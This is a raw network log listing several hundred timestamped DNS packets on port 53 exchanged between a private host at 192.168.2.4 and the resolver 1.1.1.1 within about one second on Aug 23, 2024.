Aug 23, 2024 18:47:48.739744902 CEST	53	61417	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.739753962 CEST	53	61265	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.739763021 CEST	53	55502	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.739772081 CEST	53	53111	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.739780903 CEST	53	62182	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.739789009 CEST	53	60881	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.739799023 CEST	53	60931	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.739809036 CEST	53	59290	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.739820004 CEST	53	61590	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.739829063 CEST	53	54159	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.740652084 CEST	53	63576	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.740662098 CEST	53	58851	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.740931034 CEST	53	57553	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.740941048 CEST	53	58724	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.740950108 CEST	53	61937	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.741605043 CEST	53	50549	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.741615057 CEST	53	63625	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.741622925 CEST	53	53908	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.741631985 CEST	53	62671	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.741641045 CEST	53	65005	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.741655111 CEST	53	55266	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.742276907 CEST	53	50893	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.742288113 CEST	53	61518	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.742296934 CEST	53	59268	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.743551016 CEST	53	56299	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.744146109 CEST	53	62672	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.746568918 CEST	53	53472	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.747986078 CEST	53	63363	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.752614021 CEST	53	49456	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.760152102 CEST	53	64486	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.760487080 CEST	53	53038	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.762491941 CEST	50462	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.763292074 CEST	53378	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.764008999 CEST	59592	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.764359951 CEST	56586	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.764621019 CEST	54248	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.765255928 CEST	54590	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.765280962 CEST	49912	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.765561104 CEST	58353	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.765862942 CEST	65421	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.766154051 CEST	57437	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.766424894 CEST	50470	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.767010927 CEST	52502	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.767010927 CEST	64249	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.767755985 CEST	60432	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.767755985 CEST	62442	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.768424988 CEST	50100	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.768474102 CEST	52208	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.768578053 CEST	58679	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.769190073 CEST	54955	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.769206047 CEST	54567	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.769382954 CEST	53981	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.769893885 CEST	53663	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.769927979 CEST	50025	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.770108938 CEST	65159	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.770716906 CEST	56957	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.770773888 CEST	52925	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.771053076 CEST	49248	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.771543026 CEST	57684	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.771568060 CEST	65467	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.771784067 CEST	58033	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.772506952 CEST	58264	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.772785902 CEST	57081	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.772963047 CEST	49517	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.774626970 CEST	64283	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.775896072 CEST	61499	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.776094913 CEST	52480	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.776237965 CEST	53351	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.776443005 CEST	52484	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.776616096 CEST	57027	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.776755095 CEST	57429	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.776902914 CEST	64533	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.777024984 CEST	53	50462	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.777041912 CEST	62522	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.777120113 CEST	53	59592	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.777129889 CEST	53	53378	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.777198076 CEST	61691	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.777339935 CEST	49523	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.777621984 CEST	56273	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.777908087 CEST	54352	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.778331041 CEST	63255	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.779006958 CEST	49238	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.779366016 CEST	57148	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.779695034 CEST	53	58353	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.779788017 CEST	58077	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.779921055 CEST	53	65421	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.780092001 CEST	53	54590	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.780105114 CEST	53	56586	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.780311108 CEST	56942	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.780544996 CEST	53	52502	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.780651093 CEST	53711	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.780792952 CEST	52068	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.780885935 CEST	53	57437	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.781002045 CEST	50018	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.781198025 CEST	59616	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.781388998 CEST	50780	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.781620979 CEST	59535	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.781620979 CEST	50965	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.781811953 CEST	58392	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.782308102 CEST	54747	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.782326937 CEST	64063	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.782505035 CEST	62071	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.782561064 CEST	53	64249	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.782649994 CEST	62635	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.782720089 CEST	53	62442	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.782813072 CEST	62517	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.783157110 CEST	53	60432	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.784053087 CEST	53	52208	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.784348965 CEST	53	58679	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.784363985 CEST	53	50100	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.785773039 CEST	53	53663	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.786164999 CEST	53	54567	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.786456108 CEST	53	53981	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.787713051 CEST	53	54955	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.787770033 CEST	53	56957	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.789386034 CEST	53	57684	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.789463043 CEST	53	58033	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.789473057 CEST	53	57081	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.789681911 CEST	53	58264	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.789691925 CEST	53	49517	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.790724039 CEST	53	52484	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.791198015 CEST	53	57027	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.791249037 CEST	53	64533	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.791259050 CEST	53	56273	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.791699886 CEST	53	61499	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.792180061 CEST	53	49523	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.793620110 CEST	53	57148	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.794558048 CEST	53	52068	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.794636965 CEST	53	56942	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.794647932 CEST	53	58077	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.794971943 CEST	53	59616	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.795157909 CEST	53	50018	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.795535088 CEST	53	50780	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.796123028 CEST	53	58392	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.796648026 CEST	53	62071	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.797811031 CEST	53	54747	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.798136950 CEST	53	49912	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.798738003 CEST	53	59535	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.799026012 CEST	53	54248	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.799813032 CEST	53	50470	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.812611103 CEST	53	65159	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.812735081 CEST	53	52925	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.812743902 CEST	53	50025	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.812979937 CEST	53	65467	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.813224077 CEST	53	57429	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.821261883 CEST	53	53351	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.821338892 CEST	53	52480	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.821518898 CEST	53	62522	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.822052956 CEST	53	54352	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.825021982 CEST	53	49238	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.825782061 CEST	53	53711	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.826107979 CEST	53	62517	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.826791048 CEST	53	64063	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.826953888 CEST	53	50965	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.827246904 CEST	53	62635	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.828258991 CEST	53	63255	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.935097933 CEST	53	64283	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.941370010 CEST	53	49248	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.945147038 CEST	53	61691	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.949002028 CEST	56208	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.949605942 CEST	62630	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.950565100 CEST	65520	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.951314926 CEST	53463	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.952009916 CEST	61543	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.952671051 CEST	61149	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.953289032 CEST	49530	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.954134941 CEST	54669	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.954788923 CEST	62636	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.955319881 CEST	55750	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.956000090 CEST	60405	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.956612110 CEST	62385	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.957181931 CEST	60145	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.957495928 CEST	57703	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.957858086 CEST	63135	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.958198071 CEST	52146	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.958504915 CEST	56533	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.958556890 CEST	55435	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.959089994 CEST	51168	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.959460020 CEST	53370	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.959742069 CEST	63415	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.960091114 CEST	56164	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.960392952 CEST	60172	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.960921049 CEST	49511	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.960958958 CEST	54700	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.961649895 CEST	50271	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.961910963 CEST	64833	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.962023020 CEST	58800	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.962491035 CEST	63771	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.962867975 CEST	63593	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.962887049 CEST	54890	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.963443041 CEST	58699	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.963726044 CEST	55779	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.963758945 CEST	53692	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.964360952 CEST	53651	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.964999914 CEST	60110	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.965142012 CEST	63251	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.965738058 CEST	59432	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.966201067 CEST	61620	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.966346025 CEST	60854	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.966481924 CEST	53	56208	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.966787100 CEST	60605	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.967197895 CEST	53	65520	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.967387915 CEST	61331	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.967540979 CEST	53	62630	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.967741013 CEST	55087	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.968415022 CEST	53	53463	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.968585968 CEST	63417	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.971112013 CEST	53	49530	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.971466064 CEST	53	54669	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.971609116 CEST	53	62636	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.972105026 CEST	54913	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.972373009 CEST	61136	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.972531080 CEST	59808	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.972687960 CEST	64511	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.972909927 CEST	51163	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.973041058 CEST	65085	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.973187923 CEST	62169	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.973326921 CEST	56134	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.973462105 CEST	60706	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.973586082 CEST	61432	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.973789930 CEST	62245	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.973975897 CEST	61546	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.974117041 CEST	58909	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.974136114 CEST	53	56533	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.974263906 CEST	57106	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.974320889 CEST	53	60145	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.974330902 CEST	53	57703	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.974407911 CEST	64929	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.974549055 CEST	49233	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.974674940 CEST	53	62385	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.974684954 CEST	53	55435	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.974689960 CEST	53	51168	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.975385904 CEST	53	63415	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.975395918 CEST	53	56164	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.975440025 CEST	57318	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.975667000 CEST	53	60172	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.975718975 CEST	64331	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.976146936 CEST	52097	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.976511955 CEST	60346	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.978209019 CEST	53	52146	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.978219986 CEST	53	60854	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.978228092 CEST	53	58800	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.978375912 CEST	53	63593	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.978384972 CEST	53	54890	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.978394032 CEST	53	54700	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.978403091 CEST	53	49511	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.979150057 CEST	53	53651	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.979296923 CEST	53	58699	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.979414940 CEST	53	64833	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.980005026 CEST	53	63771	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.980015039 CEST	53	60605	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.980024099 CEST	53	63251	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.980319023 CEST	53	61620	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.980329037 CEST	53	60110	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.980583906 CEST	53	63417	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.984714985 CEST	53	54913	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.984879017 CEST	53	61136	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.986079931 CEST	53	64511	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.986641884 CEST	53	51163	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.987063885 CEST	53	56134	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.987075090 CEST	53	60706	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.988974094 CEST	53	57318	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.989347935 CEST	53	61149	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.989797115 CEST	53	61432	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.989808083 CEST	53	64929	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.990287066 CEST	53	64331	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.991269112 CEST	53	57106	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.991683960 CEST	53	61543	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.991955042 CEST	53	52097	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.992079020 CEST	53	65085	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.996205091 CEST	53	55750	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.997087955 CEST	53	60405	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.997544050 CEST	53	63135	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.001437902 CEST	53	53370	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.004381895 CEST	53	53692	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.005526066 CEST	53	55087	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.007107973 CEST	53	59432	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.009741068 CEST	53	55779	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.009752989 CEST	53	59808	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.009762049 CEST	53	62169	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.014188051 CEST	53	61546	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.014271975 CEST	53	58909	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.014281034 CEST	53	49233	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.015703917 CEST	53	62245	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.018758059 CEST	53	60346	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.128546000 CEST	53	50271	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.172827005 CEST	53	61331	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.200262070 CEST	50584	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.427977085 CEST	53	50584	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.949608088 CEST	63480	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.950603008 CEST	56257	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.951076031 CEST	54661	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.951270103 CEST	51806	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.951514959 CEST	61000	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.951873064 CEST	58033	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.952397108 CEST	53788	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.952439070 CEST	53955	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.952972889 CEST	55488	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.953021049 CEST	54570	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.953521967 CEST	60908	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.953836918 CEST	59777	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.954293966 CEST	52428	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.954729080 CEST	60404	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.955136061 CEST	65424	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.955168962 CEST	57871	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.955737114 CEST	62371	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.955826044 CEST	54640	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.956258059 CEST	62262	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.956258059 CEST	51815	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.956723928 CEST	54845	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.956989050 CEST	49798	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.957094908 CEST	58764	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.957623959 CEST	57195	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.957660913 CEST	62228	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.958123922 CEST	64367	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.958550930 CEST	65458	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.958601952 CEST	50011	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.959253073 CEST	49807	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.959569931 CEST	56784	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.959821939 CEST	52503	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.959922075 CEST	62230	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.960673094 CEST	60126	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.961249113 CEST	52194	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.961597919 CEST	53379	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.961663008 CEST	50721	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.962207079 CEST	53	58033	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.962866068 CEST	55988	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.963558912 CEST	59380	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.963650942 CEST	53	51806	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.963934898 CEST	53	54661	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.963957071 CEST	50062	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.964076996 CEST	54677	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.964302063 CEST	53	54570	1.1.1.1	192.168.2.4
